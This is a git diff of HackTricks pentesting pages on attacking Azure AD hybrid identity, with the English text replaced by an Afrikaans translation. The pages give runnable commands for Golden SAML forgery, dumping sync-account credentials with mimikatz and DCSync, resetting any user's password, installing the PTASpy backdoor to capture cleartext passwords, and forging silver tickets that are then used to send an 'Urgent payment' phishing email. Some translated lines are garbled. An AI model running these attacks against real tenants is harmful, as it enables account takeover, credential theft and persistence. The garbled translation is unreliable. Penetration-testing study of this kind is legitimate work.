TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user. -- More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims) +- AD FS is 'n eise-gebaseerde identiteitsmodel. +- "..eise is eenvoudig stellings (byvoorbeeld, naam, identiteit, groep), gemaak oor gebruikers, wat hoofsaaklik gebruik word om toegang tot eise-gebaseerde toepassings wat oral op die Internet geleë is, te autoriseer." +- Eise vir 'n gebruiker word binne die SAML tokens geskryf en word dan onderteken om vertroulikheid deur die IdP te bied. +- 'n Gebruiker word geïdentifiseer deur ImmutableID. Dit is wêreldwyd uniek en word in Azure AD gestoor. +- Die ImmutableID word op-premises as ms-DS-ConsistencyGuid vir die gebruiker gestoor en/of kan afgelei word van die GUID van die gebruiker. +- Meer inligting in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims) -**Golden SAML attack:** +**Goue SAML-aanval:** -- In ADFS, SAML Response is signed by a token-signing certificate. -- If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD! -- Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response. -- The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine. -- More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) +- In ADFS, word die SAML Response deur 'n token-ondertekeningssertifikaat onderteken. +- As die sertifikaat gecompromitteer is, is dit moontlik om as ENIGE gebruiker wat met Azure AD gesinkroniseer is, na die Azure AD te verifieer! +- Net soos ons PTA misbruik, sal 'n wagwoordverandering vir 'n gebruiker of MFA geen effek hê nie omdat ons die verifikasieantwoord vervals. +- Die sertifikaat kan van die AD FS-bediener met DA voorregte onttrek word en kan dan vanaf enige internet-verbonden masjien gebruik word. +- Meer inligting in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) -### Golden SAML +### Goue SAML -The process where an **Identity Provider (IdP)** produces a **SAMLResponse** to authorize user sign-in is paramount. Depending on the IdP's specific implementation, the **response** might be **signed** or **encrypted** using the **IdP's private key**. This procedure enables the **Service Provider (SP)** to confirm the authenticity of the SAMLResponse, ensuring it was indeed issued by a trusted IdP. +Die proses waar 'n **Identiteitsverskaffer (IdP)** 'n **SAMLResponse** produseer om gebruiker aanmelding te autoriseer, is van kardinale belang. Afhangende van die spesifieke implementering van die IdP, kan die **antwoord** **onderteken** of **geënkripteer** word met die **IdP se privaat sleutel**. Hierdie prosedure stel die **Diensverskaffer (SP)** in staat om die egtheid van die SAMLResponse te bevestig, wat verseker dat dit werklik deur 'n vertroude IdP uitgereik is. -A parallel can be drawn with the [golden ticket attack](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket), where the key authenticating the user’s identity and permissions (KRBTGT for golden tickets, token-signing private key for golden SAML) can be manipulated to **forge an authentication object** (TGT or SAMLResponse). This allows impersonation of any user, granting unauthorized access to the SP. +'n Parallel kan getrek word met die [goue kaart-aanval](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket), waar die sleutel wat die gebruiker se identiteit en regte verifieer (KRBTGT vir goue kaarte, token-ondertekenings privaat sleutel vir goue SAML) gemanipuleer kan word om 'n **verifikasie objek** (TGT of SAMLResponse) te vervals. Dit stel in staat om enige gebruiker na te boots, wat ongeoorloofde toegang tot die SP verleen. -Golden SAMLs offer certain advantages: +Goue SAMLs bied sekere voordele: -- They can be **created remotely**, without the need to be part of the domain or federation in question. -- They remain effective even with **Two-Factor Authentication (2FA)** enabled. -- The token-signing **private key does not automatically renew**. -- **Changing a user’s password does not invalidate** an already generated SAML. +- Hulle kan **afgeleë geskep** word, sonder die behoefte om deel te wees van die domein of federasie in kwestie. +- Hulle bly effektief selfs met **Twee-Faktor Verifikasie (2FA)** geaktiveer. +- Die token-ondertekenings **privaat sleutel hernu nie outomaties** nie. +- **Die verandering van 'n gebruiker se wagwoord maak nie 'n reeds gegenereerde SAML ongeldig nie.** -#### AWS + AD FS + Golden SAML +#### AWS + AD FS + Goue SAML -[Active Directory Federation Services (AD FS)]() is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation. +[Active Directory Federation Services (AD FS)]() is 'n Microsoft diens wat die **veilige uitruiling van identiteitsinligting** tussen vertroude besigheidsvennote (federasie) fasiliteer. Dit stel in wese 'n domeindiens in staat om gebruikersidentiteite met ander diensverskaffers binne 'n federasie te deel. -With AWS trusting the compromised domain (in a federation), this vulnerability can be exploited to potentially **acquire any permissions in the AWS environment**. The attack necessitates the **private key used to sign the SAML objects**, akin to needing the KRBTGT in a golden ticket attack. Access to the AD FS user account is sufficient to obtain this private key. +Met AWS wat die gecompromitteerde domein vertrou (in 'n federasie), kan hierdie kwesbaarheid benut word om potensieel **enige regte in die AWS-omgewing te verkry**. Die aanval vereis die **privaat sleutel wat gebruik word om die SAML-objekte te onderteken**, soortgelyk aan die behoefte aan die KRBTGT in 'n goue kaart aanval. Toegang tot die AD FS-gebruikerrekening is voldoende om hierdie privaat sleutel te verkry. -The requirements for executing a golden SAML attack include: +Die vereistes om 'n goue SAML-aanval uit te voer sluit in: -- **Token-signing private key** -- **IdP public certificate** -- **IdP name** -- **Role name (role to assume)** -- Domain\username -- Role session name in AWS -- Amazon account ID +- **Token-ondertekenings privaat sleutel** +- **IdP publieke sertifikaat** +- **IdP naam** +- **Rolnaam (rol om aan te neem)** +- Domein\gebruikersnaam +- Rol sessienaam in AWS +- Amazon rekening ID -_Only the items in bold are mandatory. The others can be filled in as desired._ - -To acquire the **private key**, access to the **AD FS user account** is necessary. From there, the private key can be **exported from the personal store** using tools like [mimikatz](https://github.com/gentilkiwi/mimikatz). To gather the other required information, you can utilize the Microsoft.Adfs.Powershell snapin as follows, ensuring you're logged in as the ADFS user: +_Slegs die items in vetdruk is verpligtend. Die ander kan na wens ingevul word._ +Om die **privaat sleutel** te verkry, is toegang tot die **AD FS-gebruikerrekening** nodig. Van daar kan die privaat sleutel **uit die persoonlike winkel onttrek** word met behulp van gereedskap soos [mimikatz](https://github.com/gentilkiwi/mimikatz). Om die ander vereiste inligting te versamel, kan jy die Microsoft.Adfs.Powershell snapin soos volg gebruik, en verseker dat jy as die ADFS-gebruiker aangemeld is: ```powershell # From an "AD FS" session # After having exported the key with mimikatz @@ -98,9 +97,7 @@ To acquire the **private key**, access to the **AD FS user account** is necessar # Role Name (Get-ADFSRelyingPartyTrust).IssuanceTransformRule ``` - -With all the information, it's possible to forget a valid SAMLResponse as the user you want to impersonate using [**shimit**](https://github.com/cyberark/shimit)**:** - +Met al die inligting is dit moontlik om 'n geldige SAMLResponse te vergeet as die gebruiker wat jy wil naboots met behulp van [**shimit**](https://github.com/cyberark/shimit)**:** ```bash # Apply session for AWS cli python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 @@ -115,11 +112,9 @@ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file - # Save SAMLResponse to file python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml ``` -
-### On-prem -> cloud - +### Op-prem -> wolk ```powershell # With a domain user you can get the ImmutableID of the target user [System.Convert]::ToBase64String((Get-ADUser -Identity | select -ExpandProperty ObjectGUID).tobytearray()) @@ -138,9 +133,7 @@ Export-AADIntADFSSigningCertificate # Impersonate a user to to access cloud apps Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose ``` - -It's also possible to create ImmutableID of cloud only users and impersonate them - +Dit is ook moontlik om ImmutableID van slegs wolk gebruikers te skep en hulle na te boots. ```powershell # Create a realistic ImmutableID and set it for a cloud only user [System.Convert]::ToBase64String((New-Guid).tobytearray()) @@ -152,14 +145,9 @@ Export-AADIntADFSSigningCertificate # Impersonate the user Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose ``` - -## References +## Verwysings - [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed) - [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md index 0bf61effe..eeeaee8c4 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md @@ -4,43 +4,42 @@ ## Basic Information -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Password hash synchronization** is one of the sign-in methods used to accomplish hybrid identity. **Azure AD Connect** synchronizes a hash, of the hash, of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance. +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Wagwoord-hash-sinkronisering** is een van die aanmeldmetodes wat gebruik word om hibriede identiteit te bereik. **Azure AD Connect** sinkroniseer 'n hash, van die hash, van 'n gebruiker se wagwoord van 'n plaaslike Active Directory-instansie na 'n wolk-gebaseerde Azure AD-instansie.
-It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD. +Dit is die **meest algemene metode** wat deur maatskappye gebruik word om 'n plaaslike AD met Azure AD te sinkroniseer. -All **users** and a **hash of the password hashes** are synchronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\ -Moreover, **Built-in** security groups (like domain admins...) are **not synced** to Azure AD. +Alle **gebruikers** en 'n **hash van die wagwoord-hashes** word van die plaaslike na Azure AD gesinkroniseer. egter, **duidelike wagwoorde** of die **oorspronklike** **hashes** word nie na Azure AD gestuur nie.\ +Boonop, **Ingeboude** sekuriteitsgroepe (soos domein admins...) word **nie gesinkroniseer** na Azure AD nie. -The **hashes syncronization** occurs every **2 minutes**. However, by default, **password expiry** and **account** **expiry** are **not sync** in Azure AD. So, a user whose **on-prem password is expired** (not changed) can continue to **access Azure resources** using the old password. +Die **hashes sinkronisering** vind elke **2 minute** plaas. egter, standaard, **wagwoord vervaldatum** en **rekening** **verval** word **nie gesinkroniseer** in Azure AD nie. So, 'n gebruiker wie se **plaaslike wagwoord verval** (nie verander nie) kan voortgaan om **toegang tot Azure hulpbronne** te verkry met die ou wagwoord. -When an on-prem user wants to access an Azure resource, the **authentication takes place on Azure AD**. +Wanneer 'n plaaslike gebruiker 'n Azure hulpbron wil benader, vind die **authentisering plaas op Azure AD**. -**PHS** is required for features like **Identity Protection** and AAD Domain Services. +**PHS** is vereis vir funksies soos **Identiteitsbeskerming** en AAD Domeindienste. ## Pivoting -When PHS is configured some **privileged accounts** are automatically **created**: +Wanneer PHS geconfigureer is, word sommige **bevoorregte rekeninge** outomaties **gecreëer**: -- The account **`MSOL_`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**. -- An account **`Sync__installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD. +- Die rekening **`MSOL_`** word outomaties in plaaslike AD geskep. Hierdie rekening ontvang 'n **Directory Synchronization Accounts** rol (sien [dokumentasie](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) wat beteken dat dit **replicatie (DCSync) toestemmings in die plaaslike AD** het. +- 'n rekening **`Sync__installationID`** word in Azure AD geskep. Hierdie rekening kan **die wagwoord van ENIGE gebruiker** (gesinkroniseer of slegs wolk) in Azure AD **herstel**. -Passwords of the two previous privileged accounts are **stored in a SQL server** on the server where **Azure AD Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\ -The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`. +Wagwoorde van die twee vorige bevoorregte rekeninge word **in 'n SQL-server gestoor** op die bediener waar **Azure AD Connect geïnstalleer is.** Administrateurs kan die wagwoorde van daardie bevoorregte gebruikers in duidelike teks onttrek.\ +Die databasis is geleë in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`. -It's possible to extract the configuration from one of the tables, being one encrypted: +Dit is moontlik om die konfigurasie van een van die tabelle te onttrek, wat een versleuteld is: `SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;` -The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD. +Die **versleutelde konfigurasie** is versleuteld met **DPAPI** en dit bevat die **wagwoorde van die `MSOL_*`** gebruiker in plaaslike AD en die wagwoord van **Sync\_\*** in AzureAD. Daarom, om hierdie te kompromitteer, is dit moontlik om privesc na die AD en na AzureAD. -You can find a [full overview of how these credentials are stored and decrypted in this talk](https://www.youtube.com/watch?v=JEIR5oGCwdg). +Jy kan 'n [volledige oorsig van hoe hierdie akrediteer bespaar en ontsleutel in hierdie praatjie vind](https://www.youtube.com/watch?v=JEIR5oGCwdg). ### Finding the **Azure AD connect server** -If the **server where Azure AD connect is installed** is domain joined (recommended in the docs), it's possible to find it with: - +As die **bediener waar Azure AD connect geïnstalleer is** domein-verbonden is (aanbeveel in die dokumentasie), is dit moontlik om dit te vind met: ```powershell # ActiveDirectory module Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl @@ -48,9 +47,7 @@ Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAc #Azure AD module Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"} ``` - -### Abusing MSOL\_\* - +### Misbruik van MSOL\_\* ```powershell # Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module Get-AADIntSyncCredentials @@ -59,14 +56,12 @@ Get-AADIntSyncCredentials runas /netonly /user:defeng.corp\MSOL_123123123123 cmd Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"' ``` - > [!CAUTION] -> You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials. +> Jy kan ook [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) gebruik om hierdie akrediteer te verkry. -### Abusing Sync\_\* - -Compromising the **`Sync_*`** account it's possible to **reset the password** of any user (including Global Administrators) +### Misbruik van Sync\_\* +Deur die **`Sync_*`** rekening te kompromitteer, is dit moontlik om die **wagwoord** van enige gebruiker (insluitend Globale Administrators) te **herstel**. ```powershell # This command, run previously, will give us alse the creds of this account Get-AADIntSyncCredentials @@ -87,9 +82,7 @@ Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustA # Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync) ``` - -It's also possible to **modify the passwords of only cloud** users (even if that's unexpected) - +Dit is ook moontlik om **slegs die wagwoorde van wolk** gebruikers te **wysig** (selfs al is dit onverwags) ```powershell # To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID # The CloudAnchor is of the format USER_ObjectID. @@ -98,15 +91,14 @@ Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,Obj # Reset password Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers ``` - -It's also possible to dump the password of this user. +It's ook moontlik om die wagwoord van hierdie gebruiker te dump. > [!CAUTION] -> Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc. +> 'n Ander opsie sou wees om **bevoorregte toestemmings aan 'n dienshoof** toe te ken, wat die **Sync** gebruiker **toestemmings** het om te doen, en dan **daardie dienshoof** te benader as 'n manier van privesc. ### Seamless SSO -It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses. Check it in: +Dit is moontlik om Seamless SSO met PHS te gebruik, wat kwesbaar is vir ander misbruik. Kontroleer dit in: {{#ref}} seamless-sso.md @@ -120,7 +112,3 @@ seamless-sso.md - [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md index f6edf1214..79918ada7 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md @@ -4,42 +4,38 @@ ## Basic Information -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**. +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication laat jou gebruikers toe om **in te teken op beide plaaslike en wolk-gebaseerde toepassings met dieselfde wagwoorde**. Hierdie funksie bied jou gebruikers 'n beter ervaring - een minder wagwoord om te onthou, en verminder IT-helpdesk koste omdat jou gebruikers minder geneig is om te vergeet hoe om in te teken. Wanneer gebruikers in teken met Azure AD, **valideer hierdie funksie gebruikers se wagwoorde direk teen jou plaaslike Active Directory**. -In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS. +In PTA **identiteite** is **gesinchroniseer** maar **wagwoorde** **is nie** soos in PHS. -The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC). +Die verifikasie word in die plaaslike AD gevalideer en die kommunikasie met die wolk word gedoen deur 'n **verifikasie-agent** wat op 'n **plaaslike bediener** loop (dit hoef nie op die plaaslike DC te wees nie). ### Authentication flow
-1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password** -2. The **credentials** are **encrypted** and set in a **queue** in Azure AD -3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.** -4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user. +1. Om te **login** word die gebruiker herlei na **Azure AD**, waar hy die **gebruikersnaam** en **wagwoord** stuur +2. Die **bewyse** word **geënkripteer** en in 'n **ry** in Azure AD gestel +3. Die **plaaslike verifikasie-agent** versamel die **bewyse** uit die ry en **dekripteer** dit. Hierdie agent word **"Pass-through authentication agent"** of **PTA agent** genoem. +4. Die **agent** **valideer** die bewys teen die **plaaslike AD** en stuur die **antwoord** **terug** na Azure AD wat, indien die antwoord positief is, die **login** van die gebruiker **voltooi**. > [!WARNING] -> If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\ -> He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key). +> As 'n aanvaller die **PTA** **kompromitteer**, kan hy die alle **bewyse** uit die ry **sien** (in **duidelike teks**).\ +> Hy kan ook **enige bewys** na die AzureAD **valideer** (soortgelyke aanval soos Skeleton key). ### On-Prem -> cloud -If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication): - +As jy **admin** toegang het tot die **Azure AD Connect bediener** met die **PTA** **agent** wat loop, kan jy die **AADInternals** module gebruik om 'n **agterdeur** te **invoeg** wat **AL die wagwoorde** wat ingevoer word, **sal valideer** (so alle wagwoorde sal geldig wees vir verifikasie): ```powershell Install-AADIntPTASpy ``` - > [!NOTE] -> If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). - -It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed: +> As die **installasie misluk**, is dit waarskynlik as gevolg van ontbrekende [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). +Dit is ook moontlik om **die duidelike teks wagwoorde wat na die PTA-agent gestuur word** te **sien** deur die volgende cmdlet op die masjien waar die vorige agterdeur geïnstalleer is: ```powershell Get-AADIntPTASpyLog -DecodePasswords ``` - This backdoor will: - Create a hidden folder `C:\PTASpy` @@ -47,16 +43,16 @@ This backdoor will: - Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process > [!NOTE] -> When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed. +> Wanneer die AzureADConnectAuthenticationAgent diens herbegin word, word PTASpy “ontlaai” en moet dit weer geïnstalleer word. ### Cloud -> On-Prem > [!CAUTION] -> After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** +> Nadat **GA bevoegdhede** op die wolk verkry is, is dit moontlik om **nuwe PTA-agent** te **registreer** deur dit op 'n **aanvaller beheerde masjien** in te stel. Sodra die agent **opgestel** is, kan ons die **vorige** stappe **herhaal** om **te autentiseer met enige wagwoord** en ook, **die wagwoorde in duidelike teks te kry.** ### Seamless SSO -It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: +Dit is moontlik om Seamless SSO met PTA te gebruik, wat kwesbaar is vir ander misbruik. Kontroleer dit in: {{#ref}} seamless-sso.md @@ -68,7 +64,3 @@ seamless-sso.md - [https://aadinternals.com/post/on-prem_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md index 289951b91..ff5e4c204 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md @@ -4,28 +4,27 @@ ## Basic Information -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically **signs users in when they are on their corporate devices** connected to your corporate network. When enabled, **users don't need to type in their passwords to sign in to Azure AD**, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components. +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) teken **gebruikers outomaties in wanneer hulle op hul korporatiewe toestelle** gekoppel aan jou korporatiewe netwerk is. Wanneer geaktiveer, **hoef gebruikers nie hul wagwoorde in te tik om in te teken op Azure AD nie**, en gewoonlik, selfs nie hul gebruikersname nie. Hierdie funksie bied jou gebruikers maklike toegang tot jou wolk-gebaseerde toepassings sonder om enige addisionele on-premises komponente te benodig.

https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works

-Basically Azure AD Seamless SSO **signs users** in when they are **on a on-prem domain joined PC**. +Basies teken Azure AD Seamless SSO **gebruikers in** wanneer hulle **op 'n on-prem domein-verbonden PC** is. -It's supported by both [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) and [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md). +Dit word ondersteun deur beide [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) en [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md). -Desktop SSO is using **Kerberos** for authentication. When configured, Azure AD Connect creates a **computer account called AZUREADSSOACC`$`** in on-prem AD. The password of the `AZUREADSSOACC$` account is **sent as plain-text to Azure AD** during the configuration. +Desktop SSO gebruik **Kerberos** vir verifikasie. Wanneer geconfigureer, skep Azure AD Connect 'n **rekenaarrekening genaamd AZUREADSSOACC`$`** in on-prem AD. Die wagwoord van die `AZUREADSSOACC$` rekening word **as plain-text na Azure AD gestuur** tydens die konfigurasie. -The **Kerberos tickets** are **encrypted** using the **NTHash (MD4)** of the password and Azure AD is using the sent password to decrypt the tickets. +Die **Kerberos kaartjies** is **geënkripteer** met behulp van die **NTHash (MD4)** van die wagwoord en Azure AD gebruik die gestuurde wagwoord om die kaartjies te ontsleutel. -**Azure AD** exposes an **endpoint** (https://autologon.microsoftazuread-sso.com) that accepts Kerberos **tickets**. Domain-joined machine's browser forwards the tickets to this endpoint for SSO. +**Azure AD** stel 'n **eindpunt** (https://autologon.microsoftazuread-sso.com) beskikbaar wat Kerberos **kaartjies** aanvaar. Die blaaiert van die domein-verbonden masjien stuur die kaartjies na hierdie eindpunt vir SSO. ### On-prem -> cloud -The **password** of the user **`AZUREADSSOACC$` never changes**. Therefore, a domain admin could compromise the **hash of this account**, and then use it to **create silver tickets** to connect to Azure with **any on-prem user synced**: - +Die **wagwoord** van die gebruiker **`AZUREADSSOACC$` verander nooit**. Daarom kan 'n domein admin die **hash van hierdie rekening** kompromitteer, en dit dan gebruik om **silwer kaartjies** te skep om met **enige on-prem gebruiker gesinkroniseer** aan Azure te verbind: ```powershell # Dump hash using mimikatz Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"' - mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit +mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit # Dump hash using https://github.com/MichaelGrafnetter/DSInternals Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local @@ -39,9 +38,7 @@ Import-Module DSInternals $key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM' (Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos ``` - -With the hash you can now **generate silver tickets**: - +Met die hash kan jy nou **silwer kaartjies genereer**: ```powershell # Get users and SIDs Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier @@ -56,66 +53,57 @@ $at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com ## Send email Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "

Urgent!


The following bill should be paid asap." ``` +Om die silwer kaartjie te gebruik, moet die volgende stappe uitgevoer word: -To utilize the silver ticket, the following steps should be executed: - -1. **Initiate the Browser:** Mozilla Firefox should be launched. -2. **Configure the Browser:** - - Navigate to **`about:config`**. - - Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically): - - `https://aadg.windows.net.nsatc.net` - - `https://autologon.microsoftazuread-sso.com` -3. **Access the Web Application:** - - Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/). -4. **Authentication Process:** - - At the logon screen, the username should be entered, leaving the password field blank. - - To proceed, press either TAB or ENTER. +1. **Begin die Blaaier:** Mozilla Firefox moet gelaai word. +2. **Konfigureer die Blaaier:** +- Navigeer na **`about:config`**. +- Stel die voorkeur vir [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) na die gespesifiseerde 